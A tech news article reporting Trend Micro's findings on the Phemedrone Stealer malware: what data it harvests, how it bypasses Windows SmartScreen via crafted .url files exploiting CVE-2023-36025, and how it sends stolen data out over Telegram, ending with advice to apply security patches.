New malware discovered that can bypass Windows SmartScreen and steal user data
Named Phemedrone Stealer, it is a strain of data-harvesting malware that focuses on a variety of file types and specific information on popular software products ranging from browsers, file managers, communication platform, and many other types of software.
Phemedrone Stealer even possesses the ability to collect real-time operational details of the target system - including geolocation data such as IP, country, city and postal code - on Windows 10 or 11, and take screenshots in the process. Trend Micro lists the specific targets that the malware targets as follows:
- For Chromium-based browsers, the malware collects password data, cookies, and autofill information stored in applications such as LastPass, KeePass, NordPass, Google Authenticator, Duo Mobile and Microsoft Authenticator, among many others.
- For cryptocurrency wallets, Phemedrone Stealer extracts files from various cryptocurrency wallet applications such as Armory, Atomic, Bytecoin, Coninomi, Jaxx, Electrum, Exodus, and Guarda.
- As for Discord, the malware illegally accessed the user's account.
- As for FileGrabber, malware uses this service to collect user files from specified folders such as Documents and Desktop.
- For FileZilla, Phemedrone Stealer can capture FTP connection details and information from the application.
- As for Gecko, the malware targets Gecko-based browsers to extract user data (Firefox is the most popular.)
- System Information: Phemedrone Stealer collects detailed system information, including hardware specifications, geographic location, and operating system information, as well as taking screenshots.
- Steam: Phemedrone accesses files related to the Steam gaming platform.
- Telegram: The malware extracts user data from the installation directory, specifically targeting authentication-related files in the 'tdata' directory. This includes searching for files based on size and naming style.
An attack vector in this case is represented by crafted .url files that download and execute malicious scripts, bypassing Windows Defender SmartScreen in the process. Therefore, users who are tricked into opening a dangerous file will not see the SmartScreen warning that this type of file is potentially harmful to the computer. Once the malware evades detection, it downloads the payload and establishes a permanent presence in the system.
Searching for specific files and data will take place immediately after. Successfully collected data will be sent to hackers by the malware via the API of Telegram, a popular IM communication platform in several countries around the globe. System information is sent first, followed by a compressed ZIP file containing all collected data.
The good news is that Microsoft addressed the vulnerability CVE-2023-36025 on November 14. Therefore, maintaining the health of IT systems is essential, and regularly applying the latest security patches will ensure Protect yourself against zero-day vulnerabilities that exist but have not been fixed.
You should read it
- Discover a new kind of malicious code that can record the phone call to extort money
- Instructions for activating or disabling SmartScreen filter on Windows
- What is SmartScreen and why is it running on the computer?
- Detection of Windows SmartScreen vulnerability being exploited to spread DarkGate malware
- A series of malicious applications that collect user data, delete immediately if you are installing
- 2 Dangerous Trojans are being distributed heavily through fake VPN webs
- Fileless malware - Achilles heel of traditional antivirus software
- Researchers create malware based on artificial intelligence
- How to disable SmartScreen feature in Windows 8?
- Instructions to enable or disable SmartScreen on Windows 10
- Threats and risks from malware on USB Flash
- 14 games on the App Store contain malicious code, iPhone users be careful
Maybe you are interested
6 signs that your smartphone is infected with malware
What to Know About Peaklight: New Stealth Malware Targets Illegal Movie Downloads
Warning: TryCloudflare is being abused to distribute remote access malware
Learn about Warmcookie: Malware that targets people looking for work
Warning: New DISGOMOJI malware uses Discord emoji to steal data!
280 million people have installed malware-infected Chrome extensions